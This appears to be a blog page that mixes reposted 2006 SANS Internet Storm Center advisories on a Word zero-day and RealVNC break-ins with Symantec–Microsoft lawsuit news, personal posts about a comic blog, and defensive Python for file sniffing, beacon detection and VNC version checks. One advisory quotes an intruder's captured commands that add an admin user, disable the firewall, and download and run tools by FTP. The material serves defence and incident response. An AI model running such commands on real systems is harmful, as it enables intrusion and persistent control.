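    """Classify content by signature, ignoring the file name."""
    if data[:8] == OLE2_MAGIC:
        return "ole2"
    if data[:5] == RTF_MAGIC:
        return "rtf"
    return "other"


def extension_filter(filename: str) -> str:
    """The weak policy: decide on the name alone."""
    ext = os.path.splitext(filename)[1].lower()
    return "quarantine" if ext in WORD_EXTENSIONS else "allow"


def content_filter(filename: str, data: bytes):
    """The policy the diary asks for: decide on what the bytes are.
    Returns (action, reason)."""
    ext = os.path.splitext(filename)[1].lower()
    kind = sniff(data)
    if kind == "ole2":
        return "quarantine", "binary Office container named %s" % filename
    if ext in WORD_EXTENSIONS:
        # Name says Word, bytes say otherwise: not the binary format the
        # exploit rides in, but worth recording as a mismatch.
        return "allow", "%s extension with %s content (mismatch)" % (ext, kind)
    return "allow", "%s content" % kind


def compare_policies(filename: str, data: bytes):
    """Show where the two policies disagree for one attachment."""
    return {"extension_only": extension_filter(filename),
            "content_based": content_filter(filename, data)[0]}


if __name__ == "__main__":
    for name, data in (("invoice.txt", WORD_DOC_BYTES), ("notes.doc", b"just text"),
                       ("memo.rtf", RTF_BYTES), ("plan.doc", WORD_DOC_BYTES)):
        print(name, compare_policies(name, data), content_filter(name, data)[1])
```

The two cases where the policies disagree are the ones that matter: a Word binary renamed to .txt slips past the extension filter, and a plain-text file named .doc is blocked by it for no reason.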

Well I was finally able to get enough of my comic blog database up and running (with no help from my OLD webhost I might add) from backup to be able to recreate most of what is there.  It should look pretty much identical to what it did before it went down five days ago.

You can check it out at its new location: http://www.talesfromthelongbox.com/


Word 0-day, recommended defenses

Published: 2006-05-19,
Last Updated: 2006-05-19 22:04:19 UTC by Johannes Ullrich (Version: 1)

The diary about the targeted attacks using a zero-day exploit against Word triggered a lot of questions about how to defend against such an attack. We understand that many organizations cannot do without Word documents, so here are a few ideas on how to defend against these attacks.

Note that this is not a temporary situation that will blow over soon. Microsoft will release a patch against this problem in June, but even after that there are likely to be other attacks using other exploits. So let's think a bit beyond the next couple of days on how to defend your network.

  • User education is of course key, but likely insufficient. Attacks like that will use very plausible messages. Create some examples to re-emphasize this fact. "What if you receive a message from a customer you know, referencing a project you are working on, that includes a Word document". Teach users to double check out of band. "Do not open the document before calling the customer".
  • Do not trust antivirus alone. Defending against a 0-day is all about defense in depth. Antivirus is likely going to fail you for an exploit like this. Consider a system that quarantines attachments for at least 6-12 hours to allow antivirus signatures to catch up. This may not be acceptable for a lot of organizations, but right now in particular, with a known exploit in circulation, it may be a reasonable step.
  • Limit users' privileges. The particular sample we received will not run as a non-administrator user. It will be MUCH easier to clean up after an exploit like that if the user had no administrator rights.
  • Monitor outbound traffic. Your IDS and your firewall are as valuable to protect your network from malicious traffic entering as they are in protecting you against your corporate secrets leaving your network. Consider deploying "honey tokens", files with interesting names that contain a particular signature your IDS will detect.
  • Block outbound traffic. Try to limit sites accessible to users and use techniques like proxy servers to isolate your clients further. Proxy filter logs will also work great as an IDS to detect suspect traffic.
  • Limit data on desktops. Try to teach users to limit the data they store "in reach". This is a difficult balance. But a file on a remote system, which would require additional authentication, will likely not be accessible by a bot as in this case. Locally encrypted files will work too (as long as they stay encrypted until used). Encrypted file systems will not help, as they will be accessible to the user opening the Word document.
Again: none of these techniques is perfect. Each one can be circumvented. But the more layers you can wrap your users in, the better. Think about what will work well in your organization. Personal firewalls on desktops? Traffic control with flow-tools or ntop? What tools do you already have that can be used for this purpose?

There are also some rather more radical "solutions" possible if you absolutely need to be sure that you can continue working independently of this 0-day (and the inevitable variants to follow soon):
  • consider additional filtering, for example using software which converts Word DOC format to something which cannot carry the virus, e.g. RTF.  Consider using the free wvWare library. You will lose formatting but that might be an acceptable bargain for e-mail incoming from outside your organisation.
  • consider the possibility of disabling Word and replacing it with OpenOffice until Microsoft releases patches.
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Targeted attack: Word exploit - Update

Published: 2006-05-19,
Last Updated: 2006-05-19 18:23:37 UTC by Chris Carboni (Version: 1)

In yesterday's diary, Swa reported on a targeted attack that appears to use a previously undiscovered Microsoft Word exploit.

What we know so far is that when the exploit is launched, early on in the process, it drops a bot, possibly Rbot or some variant.

Once the bot is in place, it begins an extensive recon of the system: installed patches, installed AV, contents of My Documents, startup file contents, IE config...

McAfee detects the Word document with the 4766 definition file as Exploit-OleData.gen and also associates Backdoor-CKB!cfaae1eg with this exploit. (Thanks James!)

File size: 233472 bytes
MD5: c1bb026ec2b42adc17d0efb7bb31f4dc
SHA1: 02b9a9530e0f4edb3bc512707c16390ea5b394d1

Thanks again to Michael for reporting the incident to us and all the handlers who have helped in the ongoing analysis

Thanks to juha-matti for finding a few more references:

Symantec - Dropper component

Symantec - Backdoor component

This one from an anonymous reader

F-Secure

And this just sent from Microsoft Security Response Center

Microsoft is investigating new public reports of a "zero-day" attack using a vulnerability in Microsoft Word XP and Microsoft Word 2003. In order for this attack to be carried out, a user must first open a malicious Word document attached to an e-mail or otherwise provided to them by an attacker.  Microsoft will continue to investigate the public reports to help provide additional guidance for customers as necessary.

As a best practice, users should always exercise extreme caution when opening unsolicited attachments from both known and unknown sources. Microsoft is adding detection to the Windows Live Safety Center today for up-to-date removal of malicious software that attempts to exploit this vulnerability.  The Windows Live Safety Center is located at the following website:

http://safety.live.com

Microsoft is completing development of a security update for Microsoft Word that addresses this vulnerability. The security update is now being finalized through testing to ensure quality and application compatibility and is on schedule to be released as part of the June security updates on June 13, 2006, or sooner as warranted.

Customers who believe they are affected can contact Product Support Services. Contact Product Support Services in North America for help with security update issues or viruses at no charge using the PC Safety line (1866-PCSAFETY) and international customers by using any method found at this location: http://support.microsoft.com/security

As always, Microsoft encourages customers to follow its "Protect Your PC" guidance of enabling a firewall, applying all security updates and installing anti-virus software. Customers can learn more about these steps at www.microsoft.com/protect
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

If you are one of the three or four people that check out my Tales from the Longbox comic book blog, you might have noticed that the site and the RSS feed are down right now.

I will be switching hosts soon due to the inability of my current host to keep things up and running and the time it is taking to restore things after this last disaster (going on 4 days now, I even had to let THEM know it happened).

Look for more information soon.

Symantec sues Microsoft in contract dispute

SAN FRANCISCO (Reuters) - Symantec Corp. sued software rival Microsoft Corp. on Thursday, accusing it of misappropriating trade secrets to develop its own competing features and products, including the next version of Windows.

The lawsuit filed in federal court in Seattle charges the world's biggest software maker with misappropriating intellectual property and breach of contract related to a licensing deal with Veritas, which Symantec acquired last year.

It also seeks an injunction that would block the further development, sale or distribution of Vista -- the already-delayed next version of Windows -- and other products until all Symantec intellectual property is removed.

"Microsoft's pervasive and continuing disregard of Symantec's intellectual property and contract rights has irreparably harmed Symantec and constitutes trade secret misappropriation," the complaint said.

Microsoft said in a statement that it worked hard to try to resolve the dispute and that it acted within its rights under the contract.

"We are confident that our actions are wholly consistent with the legal agreements between Veritas and Microsoft and that these claims will be shown to be without merit," Microsoft said.

The dispute pits two of the biggest consumer software makers against each other and centers on a Symantec product called Volume Manager, which allows operating systems to store and manipulate large amounts of data.

The complaint accuses Microsoft of improperly incorporating the technology into its own operating system products and seeks compensation as well as the removal of the intellectual property from the company's offerings.


MSN Money - News.

Symantec Sues Microsoft to Stop Vista
 
Company claims Microsoft is wrongfully using its Veritas storage technology in the next version of Windows.

Robert McMillan, IDG News Service
Friday, May 19, 2006

Symantec has asked a U.S. court to order a halt to the development of Windows Vista, claiming that its rival is wrongfully incorporating Veritas storage technology into its next-generation OS.

Symantec sued Microsoft yesterday, seeking unspecified damages and also asking the court to remove Symantec's storage technology from a variety of Microsoft products, including Windows XP, Windows Server 2003, and the upcoming Vista and "Longhorn" Windows Server products.

"We're asking them to remove the technology, because it belongs to us," a Symantec spokesman said.

The dispute centers around an August 1996 agreement between the two companies that granted Microsoft the right to use Veritas Software's volume management technology in its Windows NT product. Symantec purchased Veritas in a $10.2 billion acquisition that closed last year.

Symantec's Claims

Symantec claims that Microsoft misappropriated its technology and even tricked the U.S. Patent and Trademark Office into granting Microsoft patents based on Symantec intellectual property. The security and storage vendor also says that portions of Microsoft's next-generation Vista and "Longhorn" server OSes are based on this misappropriated software.

Microsoft believes it has every right to use the Veritas technology, the company said in a statement. "These claims are unfounded because Microsoft actually purchased intellectual property rights for all relevant technologies from Veritas in 2004," Microsoft said. "The [1996] contract ultimately gave Microsoft the option to buy out the rights to Veritas' code and intellectual property."

According to Symantec, however, this 1996 contract prevents Microsoft from developing products that compete with the Veritas software. Vista contains a number of competing features, relating to the way Vista manages data that is stored on a number of hard drives, Symantec said.

Microsoft's buy-out was an "ill-conceived effort to whitewash" this breach of the agreement, the court filings state.

The two companies have been working at resolving the dispute since 2004, when Symantec caught wind of the Vista features following an early release of the OS at Microsoft's annual Windows Hardware Engineering Conference.

During that period, Symantec learned that "Microsoft was so bold as to file fraudulent documents with the U.S. government, claiming stake to certain Veritas inventions," the court filings state. The Microsoft patents in question, which relate to storage management, are: No. 6,553,387, No. 6,629,202, No. 6,681,310, No. 6,684,231, and No. 6,735,603.

PCWorld.com - Symantec Sues Microsoft to Stop Vista.

Targeted attack: experience from the trenches (NEW)

Published: 2006-05-19,
Last Updated: 2006-05-19 09:32:44 UTC by Chris Carboni (Version: 2)

Learning lessons from incidents is a very important part of incident handling. Yet with targeted attacks it is very hard as you need to have a case before you can learn. So learning from others is even more important in this case.

Michael reported on an unnamed organization being hit by a limited, targeted attack.

Detection is usually the hardest part of these attacks. This case seems to have been detected by a very alert user who noticed that a domain name in an email wasn't completely right.

That user detected an email coming in that originated from a domain that looked like their own, but wasn't their own (actually only had an MX record in it). The email was written to look like an internal email, including signature. It was addressed by name to the intended victim and not detected by the anti-virus software.
 
To say it in Michael's words:

"Emails were sent to specific individuals within the organization that contained a Microsoft Word attachment. This attachment, when opened, exploited a previously-unknown vulnerability in Microsoft Word (verified against a fully-patched system). The exploit functioned as a dropper, extracting a trojan byte-for-byte from the host file when executed. After extracting and launching the trojan, the exploit then overwrote the original Word document with a "clean" (not infected) copy from payload in the original infected document. As a result of the exploit, Word crashes, informs the user of a problem, and offers to attempt to re-open the file. If the user agrees, the new "clean" file is opened without incident." They are working with Microsoft on this.

"We are still analyzing the trojan dropped by the exploit. What we do know is that it communicates back to localhosts[dot]3322[dot]org via HTTP. It is proxy-aware, and "pings" this server using HTTP POSTs of 0 bytes (no data actually POSTed) with a periodicity of approximately one minute. It has rootkit-like functionality, hiding binary files associated with the exploit (all files on the system named winguis.dll will not be shown in Explorer, etc.), and invokes itself automatically by including the trojan binary in "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows". Note that, as of this morning, no anti-virus signatures detected this file as problematic according to virustotal.com.

We have traced nearly this attack to the Far East; specifically, China and Taiwan. IPs seen are registered there, domains seen are registered there, and the emails received originated from a server in that region. The attackers appear to be aware that they have been "outed", and have been routinely changing the IP address associated with the URL above.

Due to the aggravating circumstances (0-day, no AV detection), we wanted to make sure the community is aware that this problem exists as soon as possible."

We're having a look at the Word document ourselves. So far we found it apparently has embedded Excel and PowerPoint components, and we found a string in Chinese that translates to: "report test file structure information write into stack".
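Michael's description of the trojan's beacon (zero-byte HTTP POSTs to one host, about once a minute, through the proxy) is something a proxy log can be checked for. The following is an added example, not code from ISC or from the affected organization; the log format and the sample lines are constructed, and the period and tolerance values are assumptions.

```python
"""Flag hosts that send empty HTTP POSTs to one server at a steady ~1-minute cadence.

Added illustration of the beacon behaviour described in the diary; not ISC's
or Michael's code. The proxy log format and sample lines are constructed.
"""
from collections import defaultdict
from datetime import datetime

# Constructed proxy log: "<ISO timestamp> <client> <method> <host> <request bytes>"
SAMPLE_LOG = """\
2006-05-18T09:00:02 10.1.1.7 POST localhosts.3322.org 0
2006-05-18T09:00:10 10.1.1.9 GET www.example.com 412
2006-05-18T09:01:03 10.1.1.7 POST localhosts.3322.org 0
2006-05-18T09:01:59 10.1.1.7 POST localhosts.3322.org 0
2006-05-18T09:02:30 10.1.1.9 POST forms.example.com 0
2006-05-18T09:03:01 10.1.1.7 POST localhosts.3322.org 0
2006-05-18T09:04:02 10.1.1.7 POST localhosts.3322.org 0
"""

def parse_log(text):
    """Yield (timestamp, client, method, host, bytes) tuples from the log text."""
    for line in text.splitlines():
        ts, client, method, host, size = line.split()
        yield datetime.fromisoformat(ts), client, method, host, int(size)

def find_beacons(text, period=60.0, tolerance=10.0, min_hits=4):
    """Return {(client, host): hits} for empty-POST series with a regular period.

    A series qualifies when it holds at least min_hits empty POSTs and every
    gap between consecutive POSTs is within tolerance seconds of period.
    """
    series = defaultdict(list)
    for ts, client, method, host, size in parse_log(text):
        if method == "POST" and size == 0:
            series[(client, host)].append(ts)
    beacons = {}
    for key, stamps in series.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if all(abs(g - period) <= tolerance for g in gaps):
            beacons[key] = len(stamps)
    return beacons

if __name__ == "__main__":
    for (client, host), hits in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {host}: {hits} empty POSTs about one minute apart")
```

A single empty POST (the web form at 09:02:30) is ignored; only the client repeating the same empty request at a steady cadence is reported.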

Many thanks to all handlers active on this: Johannes, Chris, William, Adrien.

--
Swa Frantzen - Section 66

Update:

When the exploit is launched, early on in the process, it drops a bot, possibly Rbot or some variant.

Once the bot is in place, it begins an extensive recon of the system; installed patches, installed AV, contents of My Documents, startup file contents, IE config ..

More to follow as information becomes available.

-Chris Carboni
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

RealVNC exploits in the wild (NEW)

Published: 2006-05-19,
Last Updated: 2006-05-19 01:04:16 UTC by Swa Frantzen (Version: 3)

Active use of RealVNC to break into systems is being reported anonymously.

If you can share more details or just can report attempts, please let us know.

If you have any RealVNC exposed, check whether it has already been compromised, and if not, take measures immediately. If you want an inherently more secure solution, check how to run VNC over SSH on your specific platform.

See more of the vulnerability in the May 15th diary by Kyle Haugsness.

[updates below]
List of exploits reported to us by our readers:
  • Austin from the UK reports that all shared printers in his office started to print:
Dear Network Administrator. 

Please do not be alarmed.
My team is network security specialist.

You are using a vulnerable version of VNC.
Please upgrade your version soon.

We have not accessed your data but we could have.
Have a nice day

The intrusion reportedly happened on a workstation where a visitor left a VNC server running.

He notes that "RealVNC logs all connection IP addresses in the event manager which some people didn't know".
  • An anonymous report about the installation of tools typical of the warez and hacker crowd, such as Serv-U and pwdump.

  • Mike reported on a machine getting hacked and sent us what his IDS caught of it:
    net user [user] [pass] /ADD
    net localgroup Administrators [user] /ADD
    net stop sharedaccess
    sc delete sharedaccess
    echo open Paradise [ip] [port]  > ftptmp
    echo user [ftpuserinfo] >> ftptmp
    echo get usercontrol.exe  >> ftptmp
    echo get helpservice.svc  >> ftptmp
    echo get JAcheck.ini  >> ftptmp
    echo get JAcheck.dll  >> ftptmp
    echo bye  >> ftptmp
    ftp -n -s:ftptmp
    del ftptmp
    usercontrol /i
    net start "ms system service"
Analysis by fellow handler Scott indicated that it adds a user with admin rights, and installs what looks like Serv-U on the machine. Perhaps more happened earlier, happens later, or just was not caught.

It sure looks like these machines are slowly getting owned one by one ...

--
Swa Frantzen -- Section 66
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Security Response has published a removal tool to clean infections of W32.Mytob. Version 1.37.0 of the tool, which adds support for removal of W32.Mytob.JI@mm, can be obtained by visiting:

Symantec Security Response - W32.Mytob@mm Removal Tool.

This tool is designed to remove infections of the following threats:

Update now while you still can

RealVNC Exploits, Bleeding Snort Signature (NEW)

Published: 2006-05-16,
Last Updated: 2006-05-16 03:44:42 UTC by Kyle Haugsness (Version: 2)

Update: Matt Jonkman posted some signatures to Bleeding Snort that identify the exploit attempt. Matt reports good success with these so far. I'll do some testing with them tomorrow. http://www.bleedingsnort.com/cgi-bin/viewcvs.cgi/sigs/EXPLOIT/EXPLOIT_RealVNC?view=markup

Given the details of the RealVNC vulnerability that were disclosed this morning (May 15) on Full Disclosure, exploits are now being released. This note is to alert our readers that the exploit is trivial and very effective. (In fact, you can modify a VNC client to exploit the vulnerability with very little code changes -- around 1 line.)

Administrators should be scanning their networks for open VNC servers (typically on TCP port 5900). You want to upgrade any VNC servers that give you a protocol version above 3.3. You can use the service detection in nmap to get the protocol number.

We can't confirm that VNC servers from other projects like TightVNC or UltraVNC are vulnerable - I don't think they are vulnerable. At this time, it only appears that RealVNC servers are vulnerable. Unfortunately, there doesn't seem to be a way to determine which software the remote end is running. You only get to see the protocol number.

Unless you like to have unauthorized folks moving your mouse around the screen, you are strongly urged to upgrade to the latest RealVNC release. Also, you should consider binding the VNC daemon to 127.0.0.1 and tunnelling the VNC traffic through an SSH tunnel, which will provide you with stronger authentication mechanisms. Google "vnc over ssh" for more detailed instructions on how to accomplish this on your platform of choice.
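The inventory check described above (find VNC listeners on your own network and flag any announcing a protocol version above 3.3) comes down to reading the 12-byte RFB greeting. The following is an added example, not ISC's code; the sample greetings are constructed, and the helper that reads a live banner is an assumption about how one would apply it to a host list.

```python
"""Triage VNC servers by the RFB protocol version they announce.

Added illustration of the version check recommended in the diary; not ISC's
code. Sample greetings are constructed; only the standard library is used.
"""
import re
import socket

# An RFB server greets with exactly 12 bytes: "RFB xxx.yyy\n" (zero-padded).
RFB_BANNER = re.compile(rb"^RFB (\d{3})\.(\d{3})\n$")

def parse_rfb_version(banner):
    """Return (major, minor) from a 12-byte RFB greeting, or None if malformed."""
    m = RFB_BANNER.match(banner)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))

def needs_review(banner):
    """True when the announced protocol is above 3.3, the diary's upgrade cue."""
    version = parse_rfb_version(banner)
    return version is not None and version > (3, 3)

def grab_banner(host, port=5900, timeout=3.0):
    """Read the greeting from a live server on your own network; b'' on failure.

    Assumed helper: the server sends its version string first, so a single
    12-byte read is enough and no client data is sent.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            return s.recv(12)
    except OSError:
        return b""

# Constructed greetings: a 3.3 server, a 3.8 server, and a non-VNC listener.
SAMPLE_BANNERS = {
    "legacy-3.3": b"RFB 003.003\n",
    "modern-3.8": b"RFB 003.008\n",
    "not-vnc": b"SSH-2.0-OpenSSH_4.3\r\n",
}

if __name__ == "__main__":
    for name, banner in SAMPLE_BANNERS.items():
        verdict = "review/upgrade" if needs_review(banner) else "ok"
        print(f"{name}: version={parse_rfb_version(banner)} -> {verdict}")
```

As the diary notes, the greeting does not reveal which VNC implementation is listening, so a flagged host still needs a look at what is actually installed.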
 
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.